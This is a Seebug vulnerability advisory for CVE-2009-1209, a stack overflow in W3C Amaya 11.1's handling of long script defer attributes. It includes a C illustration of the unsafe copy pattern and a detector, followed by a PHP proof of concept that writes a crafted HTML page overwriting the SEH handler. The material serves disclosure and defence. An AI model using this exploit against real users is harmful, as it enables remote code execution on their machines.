Seebug SSV:4981
Apr 02, 2009

W3C Amaya HTML script Tag Stack Overflow Vulnerability

2009-04-02 00:00:00
Root
www.seebug.org

EPSS: 0.142 (Low), Percentile: 95.7%

BUGTRAQ ID: 34295
CVE(CAN) ID: CVE-2009-1209

Amaya is the WYSIWYG web page editor/browser produced by the W3C.

If a user is tricked into opening a web page in Amaya whose script tag carries an overly long defer attribute, a stack overflow is triggered while the page is parsed, which can lead to arbitrary code execution.

W3C Amaya 11.1

W3C

The vendor has not yet released a patch or upgrade. Users of this software are advised to watch the vendor's homepage for the latest version:

http://www.w3.org/Amaya/
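As an added illustration of the bug class this advisory describes (a model, not Amaya's own code; ATTR_MAX, the function names and the sample page are assumptions), the unbounded copy pattern sits beside its bounded replacement, and a scanner measures the longest defer value on any script tag so that pages with absurdly long values can be flagged before they reach a vulnerable parser:

```c
/* Added model of the bug class (not Amaya's code): an attribute value
 * copied into a fixed stack buffer, its bounded replacement, and a
 * scanner that flags oversized <script defer="..."> values. */
#include <stdio.h>
#include <string.h>

#define ATTR_MAX 256 /* assumed buffer size for this model */

/* Unsafe pattern: unbounded strcpy() of attacker-controlled input into a
 * fixed stack buffer; a longer value smashes the frame. Never called. */
void copy_attr_unsafe(const char *value) {
    char buf[ATTR_MAX];
    strcpy(buf, value); /* no length check */
}

/* Hardened form: reject values that do not fit, then copy with an
 * explicit bound. Returns 0 on success, -1 if the value was rejected. */
int copy_attr_bounded(const char *value, char *dst, size_t dst_size) {
    size_t len = strlen(value);
    if (dst_size == 0 || len >= dst_size)
        return -1;
    memcpy(dst, value, len + 1); /* includes the terminating NUL */
    return 0;
}

/* Detection helper: length of the longest defer="..." value on any
 * <script> tag, so a proxy or content scanner can flag outliers. */
size_t longest_script_defer(const char *html) {
    size_t longest = 0;
    const char *p = html;
    while ((p = strstr(p, "<script")) != NULL) {
        const char *end = strchr(p, '>');
        const char *attr = strstr(p, "defer=\"");
        if (attr && (end == NULL || attr < end)) { /* attr on this tag */
            const char *val = attr + strlen("defer=\"");
            const char *q = strchr(val, '"');
            size_t len = q ? (size_t)(q - val) : strlen(val);
            if (len > longest) longest = len;
        }
        p += strlen("<script");
    }
    return longest;
}
int main(void) {
    /* constructed sample, shaped like the PoC page but far shorter */
    const char *page = "<html><script defer=\"AAAAAAAAAAAAAAAAAAAA\"></script></html>";
    char buf[ATTR_MAX];
    printf("longest defer value: %zu bytes\n", longest_script_defer(page));
    printf("bounded copy: %s\n", copy_attr_bounded(page, buf, 16) ? "rejected" : "ok");
    return 0;
}
```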


<?php

/**//*

     Amaya 11.1 W3C's editor/browser
     Stack Overflow POC
     Discovered by Alfons Luja
     Thx : OiN
     select * from friends --
     This stuff overwrites SEH on my box XP home sp 2
     To correctly overwrite SEH you must upload "remote_love.html" to a remote server
     Amaya allows only printable shellcode in this case

     EAX:00000000
     ECX:43434343
     EDX:7C9037D8
     EBX:00000000
     ESP:0012DDD0
     EBP:0012DDF0
     ESI:00000000
     EDI:00000000
     EIP:43434343

*//**/

$junk = "\x41";                  // filler byte 'A'
$n_seh = "\x42\x42\x42\x42";     // pointer to next SEH record
$h_seh = "\x43\x43\x43\x43";     // SEH handler

// pad the defer attribute until the SEH record is reached
for($i=1;$i<7000 - (4*19) - 10;$i++){ $junk.="\x41"; }

$junk.=$n_seh;
$junk.=$h_seh;
$hello = "<script defer=\"".$junk."\">";

$hnd = fopen("remote_love.html","w");

if($hnd){
    fputs($hnd,$hello);
    fclose($hnd);
    echo "DONE !!\n";
} else {
    echo "Kupa !!\n";
}

?>

http://sebug.net/exploit/6085/